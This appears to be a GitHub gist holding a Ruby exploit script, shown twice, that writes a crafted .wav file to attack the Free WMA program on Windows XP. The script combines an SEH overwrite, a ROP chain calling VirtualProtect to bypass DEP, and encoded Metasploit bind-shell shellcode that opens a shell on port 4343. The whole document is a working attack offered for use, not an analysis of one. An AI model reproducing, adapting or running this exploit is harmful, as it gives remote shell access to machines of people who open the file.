mfadzilr/freewma-seh-dep-bypass.rb

## freewma-seh-dep-bypass.rb
#!/usr/bin/env ruby
# encoding: utf-8
# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Date : 01/11/2014
# Tested on windows xp sp 3 (en)
# Free WMA SEH exploit (DEP Bypass)

seh = 4104
stackpivot = 88
buf = "A" * 5000

# Metasploit shell bind port 4343
# ./msfvenom -p windows/shell/bind_tcp LHOST=0.0.0.0 LPORT=4343 -e x86/shikata_ga_nai -f ruby
bind_tcp =
"\xd9\xe5\xd9\x74\x24\xf4\xba\xee\xb9\x13\x76\x5b\x31\xc9" +
"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\xfa\x5b\xe6\x8a" +
"\xea\x15\x09\x73\xea\x45\x83\x96\xdb\x57\xf7\xd3\x49\x68" +
"\x73\xb1\x61\x03\xd1\x22\xf2\x61\xfe\x45\xb3\xcc\xd8\x68" +
"\x44\xe1\xe4\x27\x86\x63\x99\x35\xda\x43\xa0\xf5\x2f\x85" +
"\xe5\xe8\xdf\xd7\xbe\x67\x4d\xc8\xcb\x3a\x4d\xe9\x1b\x31" +
"\xed\x91\x1e\x86\x99\x2b\x20\xd7\x31\x27\x6a\xcf\x3a\x6f" +
"\x4b\xee\xef\x73\xb7\xb9\x84\x40\x43\x38\x4c\x99\xac\x0a" +
"\xb0\x76\x93\xa2\x3d\x86\xd3\x05\xdd\xfd\x2f\x76\x60\x06" +
"\xf4\x04\xbe\x83\xe9\xaf\x35\x33\xca\x4e\x9a\xa2\x99\x5d" +
"\x57\xa0\xc6\x41\x66\x65\x7d\x7d\xe3\x88\x52\xf7\xb7\xae" +
"\x76\x53\x6c\xce\x2f\x39\xc3\xef\x30\xe5\xbc\x55\x3a\x04" +
"\xa9\xec\x61\x41\x1e\xc3\x99\x91\x08\x54\xe9\xa3\x97\xce" +
"\x65\x88\x50\xc9\x72\xef\x4b\xad\xed\x0e\x73\xce\x24\xd5" +
"\x27\x9e\x5e\xfc\x47\x75\x9f\x01\x92\xda\xcf\xad\x4c\x9b" +
"\xbf\x0d\x3c\x73\xaa\x81\x63\x63\xd5\x4b\x12\xa3\x1b\xaf" +
"\x77\x44\x5e\x4f\x67\x63\xd7\xa9\xed\x9b\xbe\x62\x99\x59" +
"\xe5\xba\x3e\xa1\xcf\x96\x97\x35\x47\xf1\x2f\x39\x58\xd7" +
"\x1c\x96\xf0\xb0\xd6\xf4\xc4\xa1\xe9\xd0\x6c\xab\xd2\xb3" +
"\xe7\xc5\x91\x22\xf7\xcf\x41\xc6\x6a\x94\x91\x81\x96\x03" +
"\xc6\xc6\x69\x5a\x82\xfa\xd0\xf4\xb0\x06\x84\x3f\x70\xdd" +
"\x75\xc1\x79\x90\xc2\xe5\x69\x6c\xca\xa1\xdd\x20\x9d\x7f" +
"\x8b\x86\x77\xce\x65\x51\x2b\x98\xe1\x24\x07\x1b\x77\x29" +
"\x42\xed\x97\x98\x3b\xa8\xa8\x15\xac\x3c\xd1\x4b\x4c\xc2" +
"\x08\xc8\x7c\x89\x10\x79\x15\x54\xc1\x3b\x78\x67\x3c\x7f" +
"\x85\xe4\xb4\x00\x72\xf4\xbd\x05\x3e\xb2\x2e\x74\x2f\x57" +
"\x50\x2b\x50\x72"

sc = bind_tcp.force_encoding("utf-8")

rop_gadgets =
[
  0x004717fe,  # POP ECX # RETN [Wmpcon.exe]
  0x77c11120,  # ptr to &VirtualProtect() [IAT msvcrt.dll]
  0x00415638,  # MOV EDX,DWORD PTR DS:[ECX] # MOV EAX,EDX # RETN [Wmpcon.exe]
  0x0042608a,  # PUSH EDX # OR AL,5F # POP ESI # POP EBX # RETN
  0x00488AAD,  # RETN (Filler)
  0x004a97a3,  # POP EBP # RETN [Wmpcon.exe]
  0x004495e9,  # & jmp esp [Wmpcon.exe]
  0x00488AAD,  # RETN (Filler)
  0x004504cf,  # POP EBX # RETN [Wmpcon.exe]
  0x00000201,  # 0x00000201-> ebx
  0x1002b339,  # POP EDX # RETN [lame_enc.dll]
  0x00000040,  # 0x00000040-> edx
  0x100228b6,  # POP ECX # RETN [lame_enc.dll]
  0x004cfa01,  # &Writable location [Wmpcon.exe]
  0x1002dcde,  # POP EDI # RETN [lame_enc.dll]
  0x0040d987,  # RETN (ROP NOP) [Wmpcon.exe]
  0x1002d95d,  # POP EAX # RETN [lame_enc.dll]
  0x90909090,  # nop
  0x004ada2d,  # PUSHAD # RETN [Wmpcon.exe]
].flatten.pack("V*").force_encoding("utf-8")

payload = "\x90".force_encoding("utf-8") * 20
payload << sc

buf[stackpivot,rop_gadgets.length] = rop_gadgets
buf[stackpivot+rop_gadgets.length,payload.length] = payload
buf[seh,4] = [0x0040c192].pack('V').force_encoding("utf-8") # add esp,444

begin
  File.open("xgb.wav","w") do |fp|
    fp.write buf
    puts "file size: #{buf.length}"
    puts "sc size: #{sc.length}"
    fp.close
  end
rescue Exception => e
  puts e
end
	#!/usr/bin/env ruby
	# encoding: utf-8
	# Author : Muhamad Fadzil Ramli <mind1355[at]gmail.com>
	# Date : 01/11/2014
	# Tested on windows xp sp 3 (en)
	# Free WMA SEH exploit (DEP Bypass)

	seh = 4104
	stackpivot = 88
	buf = "A" * 5000

	# Metasploit shell bind port 4343
	# ./msfvenom -p windows/shell/bind_tcp LHOST=0.0.0.0 LPORT=4343 -e x86/shikata_ga_nai -f ruby
	bind_tcp =
	"\xd9\xe5\xd9\x74\x24\xf4\xba\xee\xb9\x13\x76\x5b\x31\xc9" +
	"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\xfa\x5b\xe6\x8a" +
	"\xea\x15\x09\x73\xea\x45\x83\x96\xdb\x57\xf7\xd3\x49\x68" +
	"\x73\xb1\x61\x03\xd1\x22\xf2\x61\xfe\x45\xb3\xcc\xd8\x68" +
	"\x44\xe1\xe4\x27\x86\x63\x99\x35\xda\x43\xa0\xf5\x2f\x85" +
	"\xe5\xe8\xdf\xd7\xbe\x67\x4d\xc8\xcb\x3a\x4d\xe9\x1b\x31" +
	"\xed\x91\x1e\x86\x99\x2b\x20\xd7\x31\x27\x6a\xcf\x3a\x6f" +
	"\x4b\xee\xef\x73\xb7\xb9\x84\x40\x43\x38\x4c\x99\xac\x0a" +
	"\xb0\x76\x93\xa2\x3d\x86\xd3\x05\xdd\xfd\x2f\x76\x60\x06" +
	"\xf4\x04\xbe\x83\xe9\xaf\x35\x33\xca\x4e\x9a\xa2\x99\x5d" +
	"\x57\xa0\xc6\x41\x66\x65\x7d\x7d\xe3\x88\x52\xf7\xb7\xae" +
	"\x76\x53\x6c\xce\x2f\x39\xc3\xef\x30\xe5\xbc\x55\x3a\x04" +
	"\xa9\xec\x61\x41\x1e\xc3\x99\x91\x08\x54\xe9\xa3\x97\xce" +
	"\x65\x88\x50\xc9\x72\xef\x4b\xad\xed\x0e\x73\xce\x24\xd5" +
	"\x27\x9e\x5e\xfc\x47\x75\x9f\x01\x92\xda\xcf\xad\x4c\x9b" +
	"\xbf\x0d\x3c\x73\xaa\x81\x63\x63\xd5\x4b\x12\xa3\x1b\xaf" +
	"\x77\x44\x5e\x4f\x67\x63\xd7\xa9\xed\x9b\xbe\x62\x99\x59" +
	"\xe5\xba\x3e\xa1\xcf\x96\x97\x35\x47\xf1\x2f\x39\x58\xd7" +
	"\x1c\x96\xf0\xb0\xd6\xf4\xc4\xa1\xe9\xd0\x6c\xab\xd2\xb3" +
	"\xe7\xc5\x91\x22\xf7\xcf\x41\xc6\x6a\x94\x91\x81\x96\x03" +
	"\xc6\xc6\x69\x5a\x82\xfa\xd0\xf4\xb0\x06\x84\x3f\x70\xdd" +
	"\x75\xc1\x79\x90\xc2\xe5\x69\x6c\xca\xa1\xdd\x20\x9d\x7f" +
	"\x8b\x86\x77\xce\x65\x51\x2b\x98\xe1\x24\x07\x1b\x77\x29" +
	"\x42\xed\x97\x98\x3b\xa8\xa8\x15\xac\x3c\xd1\x4b\x4c\xc2" +
	"\x08\xc8\x7c\x89\x10\x79\x15\x54\xc1\x3b\x78\x67\x3c\x7f" +
	"\x85\xe4\xb4\x00\x72\xf4\xbd\x05\x3e\xb2\x2e\x74\x2f\x57" +
	"\x50\x2b\x50\x72"

	sc = bind_tcp.force_encoding("utf-8")

	rop_gadgets =
	[
	0x004717fe, # POP ECX # RETN [Wmpcon.exe]
	0x77c11120, # ptr to &VirtualProtect() [IAT msvcrt.dll]
	0x00415638, # MOV EDX,DWORD PTR DS:[ECX] # MOV EAX,EDX # RETN [Wmpcon.exe]
	0x0042608a, # PUSH EDX # OR AL,5F # POP ESI # POP EBX # RETN
	0x00488AAD, # RETN (Filler)
	0x004a97a3, # POP EBP # RETN [Wmpcon.exe]
	0x004495e9, # & jmp esp [Wmpcon.exe]
	0x00488AAD, # RETN (Filler)
	0x004504cf, # POP EBX # RETN [Wmpcon.exe]
	0x00000201, # 0x00000201-> ebx
	0x1002b339, # POP EDX # RETN [lame_enc.dll]
	0x00000040, # 0x00000040-> edx
	0x100228b6, # POP ECX # RETN [lame_enc.dll]
	0x004cfa01, # &Writable location [Wmpcon.exe]
	0x1002dcde, # POP EDI # RETN [lame_enc.dll]
	0x0040d987, # RETN (ROP NOP) [Wmpcon.exe]
	0x1002d95d, # POP EAX # RETN [lame_enc.dll]
	0x90909090, # nop
	0x004ada2d, # PUSHAD # RETN [Wmpcon.exe]
	].flatten.pack("V*").force_encoding("utf-8")

	payload = "\x90".force_encoding("utf-8") * 20
	payload << sc

	buf[stackpivot,rop_gadgets.length] = rop_gadgets
	buf[stackpivot+rop_gadgets.length,payload.length] = payload
	buf[seh,4] = [0x0040c192].pack('V').force_encoding("utf-8") # add esp,444

	begin
	File.open("xgb.wav","w") do \|fp\|
	fp.write buf
	puts "file size: #{buf.length}"
	puts "sc size: #{sc.length}"
	fp.close
	end
	rescue Exception => e
	puts e
	end